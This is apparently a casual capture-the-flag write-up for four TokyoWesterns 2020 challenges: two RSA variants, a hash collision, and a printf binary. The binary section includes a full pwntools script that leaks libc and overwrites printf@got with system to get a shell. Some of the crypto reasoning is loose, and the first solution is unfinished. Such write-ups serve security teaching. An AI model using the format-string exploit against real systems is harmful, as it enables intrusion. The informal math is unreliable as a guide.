script does rsa but uses a power of 2 instead of a normal e, and uses a prime as n.

so, basically it does pow(pt,2**64,p)

this is somewhat reversible, since we can take the modular square root of the ct repeatedly until we get our plaintext.

one problem though - there are 2 modular square roots

this means that we would potentially have to go through 2**64 roots in order to get the correct one

we can reduce this significantly by finding the "pseudo-phi", which we can just use Crypto.Util.number's inverse for

this finds pow(pt,2**30,p)

this is significantly lower, and this is feasible to bruteforce

i didnt solve so i dont have script but uhhhhhh yeah

The binary forms an interactive 100-byte printf prompt, where every input has printf called on it directly. No protections, so we can execute a simple GOT overwrite attack. Firstly, we'll need to leak libc - this can be done by leaking __libc_start_main_ret at offset 39. Then, we can use a format string payload to overwrite printf@got with system. Afterwards, everything we enter into the prompt will be system'd, forming a sort of shell. We can type /bin/sh and hit enter to get into a proper shell with this, or just enjoy the existing one. we cat flag.txt to get the flag.

Flag: TWCTF{kotoshi_mo_hazimarimasita_TWCTF_de_gozaimasu}

from pwn import *
context.arch = 'amd64'
e = ELF("./nothing")
p = e.process() if args.LOCAL else remote('pwn02.chal.ctf.westerns.tokyo', 18247)
libc = e.libc if args.LOCAL else ELF("/home/kali/Tools/libc-database/libs/libc6_2.27-3ubuntu1.2_amd64/libc.so.6")
libret = 0x21b97 if not args.LOCAL else 0x26e0b
p.recvuntil(b"> ")
offset = 6
p.sendline("%39$p")
leak = int(p.recvline(),16)
log.info(f"Libc leak: {hex(leak)}")
libcbase = leak - libret
log.info(f"Libc base: {hex(libcbase)}")
libc.address = libcbase
writes = {e.got['printf']:libc.symbols['system']}
payload = fmtstr.fmtstr_payload(offset, writes)
print(len(payload))
p.sendlineafter(b"> ",payload)
p.clean()
p.sendline("/bin/sh")
p.interactive()

easy-hash

The hashing function takes a sum of the integer representation of 4 byte blocks. This means that the order of the blocks doesn't matter, we can just change the order of 2 of the blocks (that don't interfere with the other checks), and get a collision.

curl https://crypto01.chal.ctf.westerns.tokyo -d 'twctf: p givleasee me the flag of 2020'

Flag: TWCTF{colorfully_decorated_dream}

From the script, we can produce the following equations e1 * d = 1 mod phi e2 * (d + 2) = 1 mod phi

Rearranging e1 * d = 1 mod phi e2 * d + e2 * 2) = 1 mod phi

Then, we subtract e2*2 from 1 to get e1 * d = 1 mod phi e2 * d = some negative number

We then can do a trick I learnt from FwordCTF (kinda)

We multiply both equations by the opposite value to get

e1 * d * e2 = e2 e1 * e2 * d = some negative number * e1

Now we know that these are both the same, so we can simply subtract them from each other to get a multiple of phi.

If we know k*phi, we can just use that as phi, since that will still work. We use this then to get the flag.

Solve script below.

Flag: TWCTF{even_if_it_is_f4+e}

from Crypto.Util.number import long_to_bytes

n = [value]
e1 = [value]
e2 = [value]
enc = [value]

e_2 = 1 - (2*e2)
# now we have e1 * d and e2 * d

e_1 = e2 # since e1 * d = 1
e_2 = e_2 * e1

tot = e_2 - e_1
d = pow(e1,-1,tot)
pt = pow(enc,d,n)

print(long_to_bytes(pt))